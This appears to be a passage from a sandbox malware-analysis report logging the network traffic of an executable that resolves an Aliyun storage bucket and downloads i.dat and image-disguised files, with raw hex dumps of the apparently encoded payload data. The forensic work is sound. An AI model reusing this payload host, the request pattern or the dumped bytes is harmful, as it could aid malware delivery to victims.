Jan 1, 2025 08:24:43.300205946 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.300205946 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.300739050 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:43.300779104 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:43.300793886 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.300829887 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.300867081 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.300867081 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.300899029 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:43.300960064 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.315726995 CET	50008	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.315773010 CET	443	50008	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:43.315840006 CET	50008	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.316060066 CET	50008	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.316080093 CET	443	50008	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:44.543482065 CET	443	50008	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:44.543639898 CET	50008	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:44.544004917 CET	50008	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:44.544015884 CET	443	50008	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:44.544220924 CET	50008	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:44.544225931 CET	443	50008	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:44.853038073 CET	443	50008	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:44.853058100 CET	443	50008	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:44.853130102 CET	50008	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:44.853147030 CET	443	50008	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:44.853285074 CET	50008	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:44.853285074 CET	50008	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:44.853317022 CET	443	50008	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:44.853368998 CET	50008	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:44.853375912 CET	443	50008	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:44.853415966 CET	50008	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:44.853611946 CET	443	50008	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:44.853652000 CET	50008	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:44.853657007 CET	443	50008	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:44.853701115 CET	50008	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:44.854091883 CET	50008	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:44.854104996 CET	443	50008	39.103.20.97	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 08:24:23.505253077 CET	62460	53	192.168.2.4	1.1.1.1
Jan 1, 2025 08:24:24.156044006 CET	53	62460	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 1, 2025 08:24:23.505253077 CET	192.168.2.4	1.1.1.1	0xb084	Standard query (0)	3syd1z.oss-cn-beijing.aliyuncs.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 1, 2025 08:24:24.156044006 CET	1.1.1.1	192.168.2.4	0xb084	No error (0)	3syd1z.oss-cn-beijing.aliyuncs.com	sc-2ox2.cn-beijing.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 1, 2025 08:24:24.156044006 CET	1.1.1.1	192.168.2.4	0xb084	No error (0)	sc-2ox2.cn-beijing.oss-adns.aliyuncs.com	sc-2ox2.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 1, 2025 08:24:24.156044006 CET	1.1.1.1	192.168.2.4	0xb084	No error (0)	sc-2ox2.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		39.103.20.97	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

3syd1z.oss-cn-beijing.aliyuncs.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49891	39.103.20.97	443	6808	C:\Users\user\Desktop\0000000000000000.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:24:25 UTC	111	OUT	GET /i.dat HTTP/1.1 User-Agent: GetData Host: 3syd1z.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:24:25 UTC	558	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:24:25 GMT Content-Type: application/octet-stream Content-Length: 512 Connection: close x-oss-request-id: 6774EDA91F7AD93133EF56B5 Accept-Ranges: bytes ETag: "A1DCF4DAA9E8E5EDD6705AD2A497E3BB" Last-Modified: Tue, 31 Dec 2024 10:01:09 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 17586380570206300013 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: odz02qno5e3WcFrSpJfjuw== x-oss-server-time: 2
2025-01-01 07:24:25 UTC	512	IN	Data Raw: 07 1b 1b 1f 6c 25 30 30 03 43 49 54 65 2e 7a 3b 48 48 16 58 36 75 3a 3d 54 57 54 53 34 7d 32 3f 56 46 4a 51 32 22 7f 32 5d 5f 1d 53 7d 34 3a 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 5d 41 41 45 36 7f 6a 6a 59 19 13 0e 3f 74 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 00 40 4a 57 66 2d 79 38 4b 4b 15 5b 35 76 39 3e 57 54 57 50 37 7e 31 3c 55 45 49 52 31 21 7c 31 5e 5c 1e 52 7c 35 3b 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 5c 40 40 44 37 7e 6b 6b 58 18 12 0f 3e 75 21 Data Ascii: l%00CITe.z;HHX6u:=TWTS4}2?VFJQ2"2]_S}4:555555555555555555555555555555555]AAE6jjY?t aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33@JWf-y8KK[5v9>WTWP7~1<UEIR1!\|1^\R\|5;444444444444444444444444444444444\@@D7~kkX>u!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49907	39.103.20.97	443	6808	C:\Users\user\Desktop\0000000000000000.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:24:27 UTC	111	OUT	GET /a.gif HTTP/1.1 User-Agent: GetData Host: 3syd1z.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:24:27 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:24:27 GMT Content-Type: image/gif Content-Length: 135589 Connection: close x-oss-request-id: 6774EDAB7A62AC3435EBE2DC Accept-Ranges: bytes ETag: "0DDD3F02B74B01D739C45956D8FD12B7" Last-Modified: Tue, 31 Dec 2024 10:00:06 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 8642451798640735006 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw== x-oss-server-time: 27
2025-01-01 07:24:27 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-01 07:24:27 UTC	4096	IN	Data Raw: 92 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c Data Ascii: Xgf%a(\|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\aU##l3]x(c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg\|M[mm&}!rt=b!){{4{e5\|8
2025-01-01 07:24:27 UTC	4096	IN	Data Raw: 6c 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 Data Ascii: lIl]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
2025-01-01 07:24:27 UTC	4096	IN	Data Raw: 75 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 Data Ascii: uc}.0VmO2O?:G6O#y;10[XhvX&+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz\|7I}r@\|
2025-01-01 07:24:27 UTC	4096	IN	Data Raw: b7 ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 Data Ascii: /r+.'wH:M7N0]%'Me"!pu\|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`
2025-01-01 07:24:27 UTC	4096	IN	Data Raw: b7 d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)\|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#\|1-PWlno<\|vwx1P]LHXEI
2025-01-01 07:24:27 UTC	4096	IN	Data Raw: ce d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
2025-01-01 07:24:27 UTC	4096	IN	Data Raw: db 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a Data Ascii: UqLT&&oabc\|}~x3~=,N<>HEO>L.XU_.\heo+lxu;\|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_
2025-01-01 07:24:27 UTC	4096	IN	Data Raw: 56 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 Data Ascii: VZ~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph\|{NJL
2025-01-01 07:24:27 UTC	4096	IN	Data Raw: 65 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd Data Ascii: eWUsXa`e/nnbc\|}~x;9y}QTp\|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o\|PRSTY'xe89-jYkk$P}wtuixyz\|~9~mMtwv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49923	39.103.20.97	443	6808	C:\Users\user\Desktop\0000000000000000.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:24:29 UTC	111	OUT	GET /b.gif HTTP/1.1 User-Agent: GetData Host: 3syd1z.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:24:29 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:24:29 GMT Content-Type: image/gif Content-Length: 125333 Connection: close x-oss-request-id: 6774EDAD51FCAD343702444E Accept-Ranges: bytes ETag: "2CA9F4AB0970AA58989D66D9458F8701" Last-Modified: Tue, 31 Dec 2024 10:00:06 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10333201072197591521 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: LKn0qwlwqliYnWbZRY+HAQ== x-oss-server-time: 13
2025-01-01 07:24:29 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-01 07:24:29 UTC	4096	IN	Data Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 Data Ascii: ^_X$pdddefg`abc\|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123\|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
2025-01-01 07:24:29 UTC	4096	IN	Data Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
2025-01-01 07:24:29 UTC	4096	IN	Data Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 